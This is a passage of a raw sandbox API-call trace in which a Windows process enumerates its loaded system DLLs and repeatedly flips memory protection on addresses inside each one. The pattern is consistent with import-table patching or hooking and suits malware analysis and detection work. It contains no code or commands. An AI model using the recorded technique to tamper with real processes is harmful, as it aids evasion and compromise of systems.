returned 0x0 [0052.885] GetCurrentProcess () returned 0xffffffff [0052.885] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74436024, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74436000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.886] GetCurrentProcess () returned 0xffffffff [0052.886] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74436024, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74436000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.886] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.887] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.887] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.887] GetModuleFileNameA (in: hModule=0x77910000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")) returned 0x28 [0052.887] GetCurrentProcess () returned 0xffffffff [0052.887] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77963038, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77963000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.887] GetCurrentProcess () returned 0xffffffff [0052.887] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77963038, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77963000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.888] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.888] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.889] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.889] GetModuleFileNameA (in: hModule=0x77440000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0052.889] GetCurrentProcess () returned 0xffffffff [0052.889] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x774ca18c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x774ca000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.890] GetCurrentProcess () returned 0xffffffff [0052.890] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x774ca18c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x774ca000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.890] GetCurrentProcess () returned 0xffffffff [0052.890] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x774ca198, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x774ca000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.890] GetCurrentProcess () returned 0xffffffff [0052.890] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x774ca198, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x774ca000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.891] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.891] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.892] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.892] GetModuleFileNameA (in: hModule=0x74940000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")) returned 0x1f [0052.892] GetCurrentProcess () returned 0xffffffff [0052.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74b3f374, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74b3f000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.892] GetCurrentProcess () returned 0xffffffff [0052.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74b3f374, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74b3f000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.892] GetCurrentProcess () returned 0xffffffff [0052.892] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74b3f37c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74b3f000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.892] GetCurrentProcess () returned 0xffffffff [0052.893] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74b3f37c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74b3f000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.893] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.893] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.893] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.893] GetModuleFileNameA (in: hModule=0x75760000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0052.893] GetCurrentProcess () returned 0xffffffff [0052.893] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x75c5ea14, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x75c5e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.894] GetCurrentProcess () returned 0xffffffff [0052.894] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x75c5ea14, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x75c5e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.894] GetCurrentProcess () returned 0xffffffff [0052.894] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x75c5ea18, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x75c5e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.894] GetCurrentProcess () returned 0xffffffff [0052.894] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x75c5ea18, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x75c5e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.894] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.895] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.896] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.896] GetModuleFileNameA (in: hModule=0x744b0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0052.896] GetCurrentProcess () returned 0xffffffff [0052.896] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x744e3130, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x744e3000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.896] GetCurrentProcess () returned 0xffffffff [0052.896] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x744e3130, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x744e3000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.896] GetCurrentProcess () returned 0xffffffff [0052.896] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x744e3148, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x744e3000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.897] GetCurrentProcess () returned 0xffffffff [0052.897] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x744e3148, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x744e3000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.897] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.897] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.898] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.898] GetModuleFileNameA (in: hModule=0x77750000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\shcore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")) returned 0x1e [0052.898] GetCurrentProcess () returned 0xffffffff [0052.898] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x777ce184, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x777ce000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.898] GetCurrentProcess () returned 0xffffffff [0052.898] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x777ce184, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x777ce000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.898] GetCurrentProcess () returned 0xffffffff [0052.898] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x777ce19c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x777ce000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.899] GetCurrentProcess () returned 0xffffffff [0052.899] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x777ce19c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x777ce000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.899] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.900] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.900] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.900] GetModuleFileNameA (in: hModule=0x76d40000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")) returned 0x27 [0052.900] GetCurrentProcess () returned 0xffffffff [0052.900] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7725e3a0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7725e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.900] GetCurrentProcess () returned 0xffffffff [0052.900] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7725e3a0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7725e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.901] GetCurrentProcess () returned 0xffffffff [0052.901] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7725e3a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7725e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.901] GetCurrentProcess () returned 0xffffffff [0052.901] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7725e3a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7725e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.901] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.902] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.902] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.902] GetModuleFileNameA (in: hModule=0x76ba0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0052.903] GetCurrentProcess () returned 0xffffffff [0052.903] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x76bdc298, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x76bdc000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.903] GetCurrentProcess () returned 0xffffffff [0052.903] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x76bdc298, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x76bdc000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.903] GetCurrentProcess () returned 0xffffffff [0052.903] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x76bdc2ac, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x76bdc000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.904] GetCurrentProcess () returned 0xffffffff [0052.904] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x76bdc2ac, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x76bdc000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.904] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.905] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.905] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.905] GetModuleFileNameA (in: hModule=0x773a0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")) returned 0x26 [0052.905] GetCurrentProcess () returned 0xffffffff [0052.905] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773a837c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x773a8000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.906] GetCurrentProcess () returned 0xffffffff [0052.906] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773a837c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x773a8000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.906] GetCurrentProcess () returned 0xffffffff [0052.906] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773a838c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x773a8000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.906] GetCurrentProcess () returned 0xffffffff [0052.906] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773a838c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x773a8000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.907] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.907] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.907] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.908] GetModuleFileNameA (in: hModule=0x74460000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0052.908] GetCurrentProcess () returned 0xffffffff [0052.908] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7447708c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74477000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.908] GetCurrentProcess () returned 0xffffffff [0052.908] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7447708c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74477000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.908] GetCurrentProcess () returned 0xffffffff [0052.908] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74477098, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74477000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.909] GetCurrentProcess () returned 0xffffffff [0052.909] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74477098, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74477000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.909] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.910] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.910] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.910] GetModuleFileNameA (in: hModule=0x756d0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0052.910] GetCurrentProcess () returned 0xffffffff [0052.910] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x756dc0b4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x756dc000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.910] GetCurrentProcess () returned 0xffffffff [0052.910] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x756dc0b4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x756dc000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.911] GetCurrentProcess () returned 0xffffffff [0052.911] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x756dc0bc, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x756dc000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.911] GetCurrentProcess () returned 0xffffffff [0052.911] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x756dc0bc, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x756dc000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.911] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.912] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.912] GetModuleFileNameA (in: hModule=0x742d0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0052.912] GetCurrentProcess () returned 0xffffffff [0052.912] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742d50ac, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742d5000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.913] GetCurrentProcess () returned 0xffffffff [0052.913] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742d50ac, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742d5000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.913] GetCurrentProcess () returned 0xffffffff [0052.913] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742d50c4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742d5000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.913] GetCurrentProcess () returned 0xffffffff [0052.914] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742d50c4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742d5000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.914] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.915] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.915] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.915] GetModuleFileNameA (in: hModule=0x74270000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")) returned 0x1f [0052.915] GetCurrentProcess () returned 0xffffffff [0052.915] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd010, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.915] GetCurrentProcess () returned 0xffffffff [0052.915] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd010, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.915] GetCurrentProcess () returned 0xffffffff [0052.916] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd018, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.916] GetCurrentProcess () returned 0xffffffff [0052.916] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd018, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.916] GetCurrentProcess () returned 0xffffffff [0052.916] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd03c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.917] GetCurrentProcess () returned 0xffffffff [0052.917] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd03c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.917] GetCurrentProcess () returned 0xffffffff [0052.917] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x742bd040, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x742bd000, NumberOfBytesToProtect=0x13ffb9c, 